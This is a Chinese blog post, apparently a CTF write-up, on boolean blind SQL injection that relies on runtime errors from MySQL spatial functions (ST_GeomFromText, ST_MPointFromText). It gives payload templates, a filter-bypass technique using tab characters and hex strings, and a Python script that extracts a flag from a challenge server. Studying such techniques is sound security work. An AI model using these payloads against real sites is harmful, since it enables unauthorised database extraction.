记一次基于运行错误的Bool型注入write up

阅读量

在参考了gq师兄的writeup与网上MADS师傅的博客后尝试写下来学到的

基于运行错误的BOOL型注入

什么是基于运行错误的BOOL性注入

比较常遇见的盲注是服务端会根据sql语句的逻辑true or false来返回不同的东西,而这里的是根据sql语句的执行情况的true or false来返回不同的东西,这样说来就是它可以通过MySQL解释器检查,但运行时又会产生错误的函数,然后“恰逢其时”地出现

Spatial Functions

通过传入非法参数给空间函数进行报错注入,ST_GeomFromText ST_MPointFromText 是两个可以从文本中解析Spatial function的函数,当我们让它的语法符合MySQL的规则,但在解析文本处做些手脚,这样我们就可以通过MySQL的预检查,但是在运行时又产生“恰到好处”的错误,这样我们就可以进行盲注了

ST_GeomFromText针对的是POINT()函数

ST_MPointFromText针对的是MULTIPOINT()函数

  • ST_GeomFromText 为例
1
2
3
4
5
6
7
8
9
mysql> SELECT IF(1, ST_X(ST_GeomFromText('POINT(mads)')), 0);
ERROR 3037 (22023): Invalid GIS data provided to function st_geometryfromtext.
mysql> SELECT IF(0, ST_X(ST_GeomFromText('POINT(mads)')), 0);
+------------------------------------------------+
| IF(0, ST_X(ST_GeomFromText('POINT(mads)')), 0) |
+------------------------------------------------+
|                                              0 |
+------------------------------------------------+
1 row in set (0.00 sec)

上述例子中很明显POINT函数传入的必须是GIS中的地理坐标的数据类型,但在这里写入一个常量或underfined类型却也能正常运行

而当我们将if的表达式改成false后,会执行中间的参数,POINT的数据类型错误会导致报错

1
2
mysql> SELECT IF(1, ST_X(ST_GeomFromText('POINT(mads)')), 0);
ERROR 3037 (22023): Invalid GIS data provided to function st_geometryfromtext.

总结整理其他可用函数

1
2
3
4
5
SELECT IF({}, ST_X(ST_GeomFromText('POINT(mads)')), 0);
SELECT IF({}, ST_MPointFromText('MULTIPOINT (mads)'),0);
SELECT IF({}, ST_X(MADS), 0);
SELECT IF({}, ST_MPointFromText('MADS'),0);
SELECT IF({}, ST_GeomFromText('MADS'),0);

题目

我们可以发现这道题不论参数传入的数字都是只会返回同一张图片,

但如果传入的参数包含被ban掉的字符,则会返回另一张图,

借此我们就可以有一个简单的思路了

但我们首先抓包爆破一下看一下有哪些字符被ban了

得出

union

*

substr

mid

=

like

into

file

sleep

benchmark

^

or

空格

&

>

<

#

-

ascii

ord

这里过滤了空格,我们可以用\t来代替,也就是%09,在写脚本时可以用TAB键来输入,而过滤掉的单双引号也可以用十六进制来代替字符串

我们用ST_GeomFromText来解题,构造payload

1
index.php?cat=1%09and%09IF(0,ST_X(ST_GeomFromText(0x504F494E54286D61647329)),0)

如果if表达式false则可以返回正常的页面

如果为true,则返回错误的页面

据此可以编写python脚本

1
2
3
4
5
6
7
8
9
10
11
12
13
14
15
16
17
18
19
20
21
22
23
24
25
26
27
28
29
30
31
32
33
34
35
36
37
38
#author:Gqleung
#Email:  admin@plasf.cn
#blog:   http://www.plasf.cn

import requests

def ord2hex(string):
	result = ""
	for i in string:
		r = hex(ord(i));
		r = r.replace('0x','')
		result = result+r
	return '0x'+result

url = "http://47.98.234.232:28039/index.php?cat="
tables = 'ABCDEFGHIJKLMNOPQRSTUVWXYZabcdefghijklmnopqrstuvwxyz0123456789-}{'
result=""
flag=1
result2=""
for i in range(1,70):
	for j in tables:
		if flag ==1:
			payload = "1	and	IF((select	flag	from	flag)	regexp	binary	%s,	ST_X(ST_GeomFromText(0x504F494E54286D61647329)),	0)"%(ord2hex(result+j))
		else:
			payload = "1	and	IF(replace((select	flag	from	flag),%s,0x7B)	regexp	binary	%s,	ST_X(ST_GeomFromText(0x504F494E54286D61647329)),	0)"%(ord2hex(result),ord2hex('^'+result2+j))
		#regexp 猜测的长度有限,所以将原来猜到的内容进行替换,再猜后面的内容。	
		r = requests.get(url+payload);
		if 'cat' not in r.text:

			if flag==1:
				result=result+j
				print(result)
			else:
				result2=result2+j
				print(result[:-1]+result2)
			if(len(ord2hex(result+j))>=54):
				flag=2
			break

运行结果

除了报错盲注,也可以用延时盲注,在MADS师傅的博客中有评论介绍,但确实没理解,所以此处不做讨论学习

谢谢你请我吃糖果

扫一扫,分享到微信

微信分享二维码
总访问量:

tag:

    缺失模块。
    1、请确保node版本大于6.2
    2、在博客根目录(注意不是yilia根目录)执行以下命令:
    npm i hexo-generator-json-content --save

    3、在根目录_config.yml里添加配置: 

      jsonContent:
    meta: false
    pages: false
    posts:
      title: true
      date: true
      path: true
      text: false
      raw: false
      content: false
      slug: false
      updated: false
      comments: false
      link: false
      permalink: false
      excerpt: false
      categories: false
      tags: true

新鲜出炉小菜比